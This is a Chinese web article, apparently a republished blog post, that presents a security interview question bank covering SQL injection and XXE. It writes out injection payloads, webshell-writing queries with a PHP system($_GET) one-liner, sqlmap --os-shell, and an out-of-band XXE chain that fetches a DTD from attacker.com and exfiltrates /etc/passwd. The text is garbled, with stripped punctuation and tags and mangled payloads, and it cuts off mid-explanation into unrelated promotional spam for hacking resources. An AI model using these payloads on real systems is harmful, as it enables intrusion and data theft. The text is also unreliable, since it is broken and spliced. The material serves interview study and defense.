ARTICLE DETAIL

建站实战干货

来自一线的建站与推广经验沉淀,每一条都经过真实交付验证。

护网面试题库大公开!小白程序员必备,高频考点助你轻松突击,速收藏!

2026/8/20 17:19:09 拓冰建站 浏览量
护网面试题库大公开!小白程序员必备,高频考点助你轻松突击,速收藏! 护网面试题库大公开小白程序员必备高频考点助你轻松突击速收藏本文整理了网络安全实际面试中出现频率最高的题目涵盖SQL注入、XXE外部实体注入、文件上传、文件包含、XSS跨站脚本攻击、CSRF/SSRF跨站请求伪造、代码执行与命令执行、反序列化漏洞、逻辑越权验证码等多个重要领域。详细解析了各类型漏洞的原理、利用方法、防御措施以及绕过技巧帮助小白程序员快速掌握网络安全核心知识为护网行动和面试做好充分准备。护网来临很多人反馈护网面试题题库像大海捞针我整理了实际面试中出现频率最高的题助大家压缩突击范围一、SQL注入01 SQL注入原理服务器接受用户传入的恶意参数未经处理或处理不严格然后带入数据库执行查询操作从而获取到敏感信息甚至执行危险的代码或系统命令。注入点前端页面上所有提交数据的地方不管是登录、注册、留言板、评论区、分页等等地方只要是提交数据给后台后台拿着该数据和数据库交互了那么这个地方就可能存在注入点。02SQL注入分类(按执行效果)联合注入用union的情况下的注入。报错注入用特定函数人为触发报错从页面里获取返回的错误信息。堆叠注入可以同时执行多条语句的执行时的注入。二次注入数据库验证输入不严格一次注入可能对数据进行了转义但写数据时保留了原数据形成脏数据。程序再次从数据库中检索数据时还默认此数据是安全的不再对数据进行转义。导致最终还是拼接到了SQL查询里。盲目注入布尔盲注根据返回页面判断条件真假的注入。时间盲注根据返回页面时间延迟来判断带有时间延迟函数的条件语句是否执行的注入。DNSlog注入利用了DNS服务器在解析域名时会记录解析活动的特点。盲注时把想要的数据和域名拼接dnslog平台就会把请求记录显示出来。宽字节注入MySQL默认使用GBK编码2个字节形成一个汉字字符如果数据库配置对单引号转义后台在处理单引号时会添加转义符/注入载荷时添加一个字节使载荷进入数据库时这个字节和转义符形成一个汉字然后使单引号继续生效。偏移量注入是利用数据库表间的字段数量差异通过对较少字段表的记录进行偏移来访问和操作较多字段表中的数据。此技术要联合查询且页面上有有回显点。加密注入前端提交的有些数据会被前端代码加密处理到后台解密后再进行数据库查询。那么注入语句也应该按照相同的加密方式加密后再进行注入。中转注入通过篡改网络请求或响应过程的中间数据再发送到指定网址上去来实现攻击的注入。BURP伪静态注入伪静态就是看似为静态页面实则为动态页面而伪静态页面的注入就叫伪静态注入。03盲注分类时间盲注一般用工具测根据返回页面时间延迟来判断带时间延迟函数的条件语句是否执行的注入。sleep():对当前线程暂停指定秒数。如:and if(substr(database(),1,1)‘p’,sleep(5),null)#benchmark():通过修改执行次数达到延迟。如:and if(substr(database(),1,1)‘p’,benchmark(2000, MD(1)),null)#If():用条件语句查看时间延迟语句是否执行。WAITFOR DELAY ‘00:00:10’布尔盲注根据返回页面判断条件真假的注入。length用于判断字符串的长度。substr用于提取字符串中的一部分。substr(字符串,起始位,字符数) 如select substr(database(),1,1);ascii 返回参数中的第一个字符的ASCII值。如select ascii(substr(database(),1,1));结合判断真假select ascii(substr(database(),1,1)) 113;Dnslog盲注利用load_file()函数可以解析dns请求。利用DNS服务器在解析域名时会记录解析活动。指令payloadselect load_file(‘//SQL注入查询语句.a.com’)注意配置secure_file_priv“”确保load_file()函数具有读文件权限。注意load_file()不仅能加载本地文件还能对如//www.a.com这样的URL发请求。这种URL也叫UNC路径。借助load_file 函数能访问某网址的特性进行DNSlog注入。有些地方用Hex编码目的是减少干扰因为很多数据库字段的值可能有特殊符号这些特殊符号拼接在域名里是无法做dns查询的因为域名有一定规范有些符号不能带入。04常见报错注入函数XPath语法必须以斜杠/开头:select updatexml(‘111’,‘/h1’,‘x’);取消斜杠触发报错添加括号优先执行select updatexml(‘1’,(select user()),‘1’);显示不全则用concat()拼接函数拼接updatexml(‘1’,concat(‘~’,(select user()),‘~’),‘1’);对连接~符进行16进制处理’ and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)#updatexml(xml_document、xpath_string、new_value)对XML文档数据进行查询、修改、替换。extractvalue(xml_document、xpath_string) 对XML文档数据进行查询。exp()和floor()取整函数05 SQL注入怎么获取Webshell通过into_outfile函数写入木马getshell使用sqlmap --os-shell获取shell通过日志写入shell插入一句话木马select ‘一句话’ into outfile ‘路径’06 SQL注入怎么Getshell–os-shell参数sqlmap -r /root/1.txt --os-shell要求为数据库DBA权限用–is-dba查看是否是DBA权限一般默认为DBA要求目录可以导入导出(secure_file_priv“”)能使用单引号(GPC为off转义功能关闭)知道网站的绝对路径原理如需要提权就利用into_outfile函数写入恶意文件UDF库通过UDF自定义函数调用系统命令(需提前编译适配操作系统的共享库并写入插件目录)。或直接通过into_outfile写入木马sqlmap会自动检测条件并选择最优方式into_outfile写木马Web目录具有导入导出权限(secure_file_priv“”)能使用单引号(GPC为off转义功能关闭)要求为数据库root用户知道网站绝对路径日志写Shell让数据库自己‘写日志’然后把‘日志’变成木马步骤通过SQL注入改数据库配置把通用日志general_log on打开。改general_log_file参数指定日志路径如/var/www/html/shell.php。把日志文件伪装成PHP文件。执行查询将日志写入木马SELECT ‘?php system($_GET[1]);?’;最后浏览器访问即可。要求不需要secure file priv值。需要知道网站根目录。数据库账号有FILE权限或root权限改全局变量写文件载荷select ‘一句话’ into_outfile/into_dumpfile ‘路径’07 SQL注入写入一句话的条件01 知道网站的绝对路径。02 MySQL对目标路径有写权限。03 MySQL连接的用户有FILE权限或ROOT权限。04 secure_file_priv配置值非NULL或包含了导入导出的绝对路径。Mysql 5.5.53 默认为空即默认无限制。05 GPC全局变量magic_quotes_gpc关闭不转义闭合引号。outfile和dumpfile的路径不支持hex必须有引号包裹。06 阻止命令执行函数disable_functions被禁止。08sql注入最好的修复建议最佳防御预编译原理使用参数化查询先预编译SQL结构再绑定参数将用户输入视为参数值而非代码执行从而阻断SQL注入攻击。简单的说用问号或变量代替直接拼接用户输入写SQL时先定好语句结构如SELECT * FROM users WHERE id ?问号相当于占位符。实际执行时再把用户传参绑定到这个位置。好处是数据库会先编译好这个语句结构之后传来的参数不管包含什么特殊字符都会被当作纯文本处理。而不会变成可执行的SQL代码。其他防御数据库信息加密安全敏感信息加密存储一次MD5后加盐再MD5检验提交的数据对输入进行判断过滤转义分级管理限制数据库权限严格区分用户权限关闭应用的错误提示限制输入长度加Waf09mysql写文件函数的区别outfile写入支持多行数据同时导出会在换行符制表符后面追加反斜杠会在末尾追加换行使用union联合查询时要保证两侧查询的列数相同dumpfile写入每次只能导出一行数据不会在换行符制表符后面追加反斜杠不会在末尾追加换行10为何MySQL数据库的网站只开放80端口站库分离架构数据库与应用物理隔离MySQL部署在内网环境不对外开放外部仅暴露Web服务的80端口。防火墙只允许访问80端口端口访问控制端口被修改或者端口复用通过反向代理将3306端口流量伪装成80端口的HTTP请求实现端口复用。检验通过nmap -p 1-65535 扫描全端口确认3306是否过滤二、XXE外部实体注入01 XXE外部实体注入原理解析用户传入的伪造XML产生的漏洞。程序没有禁止加载外部实体导致传入可解析的XML恶意文件产生的漏洞。造成读取文件命令执行内网扫描攻击内网网站等危害。02 XXE使用的伪协议file 用来加载本地文件dict 查询字典数据库http 用来加载远程文件php 用来读取php源码ftp 用来访问ftp服务器上的文件gopher检索和分发文档03 网站存在XXE该怎么利用有回显直接传入载荷?xml version1.0?]hacker;无回显步骤1载荷先建立*.DTD文档目标系统无直接回显时可通过外带数据提取信息。分2步如下建立DTD文档放入攻击者服务器用php://filter协议读取目标文件内容!ENTITY % file SYSTEM php://filter/readconvert.base64-encode/resourcefile:///c:/1.txt !ENTITY % int !ENTITY % send SYSTEM http://攻击者地址?p%file;无回显步骤2载荷再使用XML调用远程的DTD恶意文档通过XML调用攻击者服务器的DTD文档用远程文件里的恶意代码获取受害者服务器的信息。在将获取的数据通过HTTP请求外传到攻击者控制的接收服务器。%remote;%int;send;]04无回显的XXE怎么利用1先构造远程dtd文件。2然后进行远程调用获取数据后再发送出去实现外带。详细过程%remote发起请求加载远程DTD 文件如http://attacker.com/test.dtd。效果等同于将外部 DTD 包含到当前 XML 解析环境中。%int调用远程DTD 中定义的 %file 实体。用%file读取目标服务器上的敏感文件如/etc/passwd。%send将%file获取的数据编码后(因XML限制互动话题如果你对网络攻防技术感兴趣想学习更多网安方面的知识和工具可以看看以下题外话题外话黑客/网络安全学习路线今天只要你给我的文章点赞我私藏的网安学习资料一样免费共享给你们来看看有哪些东西。网络安全学习资源分享:下面给大家分享一份2026最新版的网络安全学习路线资料帮助新人小白更系统、更快速的学习黑客技术一、2026最新网络安全学习路线一个明确的学习路线可以帮助新人了解从哪里开始按照什么顺序学习以及需要掌握哪些知识点。对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图学习规划。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。**读者福利 |***CSDN大礼包《网络安全入门进阶学习资源包》免费分享 *安全链接放心点击我们把学习路线分成L1到L4四个阶段一步步带你从入门到进阶从理论到实战。L1级别:网络安全的基础入门L1阶段我们会去了解计算机网络的基础知识以及网络安全在行业的应用和分析学习理解安全基础的核心原理关键技术以及PHP编程基础通过证书考试可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。L2级别网络安全的技术进阶L2阶段我们会去学习渗透测试包括情报收集、弱口令与口令爆破以及各大类型漏洞还有漏洞挖掘和安全检查项目可参加CISP-PTE证书考试。L3级别网络安全的高阶提升L3阶段我们会去学习反序列漏洞、RCE漏洞也会学习到内网渗透实战、靶场实战和技术提取技术系统学习Python编程和实战。参加CISP-PTE考试。L4级别网络安全的项目实战L4阶段我们会更加深入进行实战训练包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握而L3 L4更多的是通过项目实战来掌握核心技术针对以上网安的学习路线我们也整理了对应的学习视频教程和配套的学习资料。二、技术文档和经典PDF书籍书籍和学习文档资料是学习网络安全过程中必不可少的我自己整理技术文档包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点电子书也有200多本书籍含电子版PDF三、网络安全视频教程对于很多自学或者没有基础的同学来说书籍这些纯文字类的学习教材会觉得比较晦涩难以理解因此我们提供了丰富的网安视频教程以动态、形象的方式展示技术概念帮助你更快、更轻松地掌握核心知识。网上虽然也有很多的学习资源但基本上都残缺不全的这是我自己录的网安视频教程上面路线图的每一个知识点我都有配套的视频讲解。四、网络安全护网行动/CTF比赛学以致用当你的理论知识积累到一定程度就需要通过项目实战在实际操作中检验和巩固你所学到的知识同时为你找工作和职业发展打下坚实的基础。五、网络安全工具包、面试题和源码“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等感兴趣的同学不容错过。面试不仅是技术的较量更需要充分的准备。在你已经掌握了技术之后就需要开始准备面试我们将提供精心整理的网安面试题库涵盖当前面试中可能遇到的各种技术问题让你在面试中游刃有余。如果你是要找网安方面的工作它们绝对能帮你大忙。这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的如果大家有好的题目或者好的见解欢迎分享。参考解析深信服官网、奇安信官网、Freebuf、csdn等内容特点条理清晰含图像化表示更加易懂。内容概要包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…**读者福利 |***CSDN大礼包《网络安全入门进阶学习资源包》免费分享 *安全链接放心点击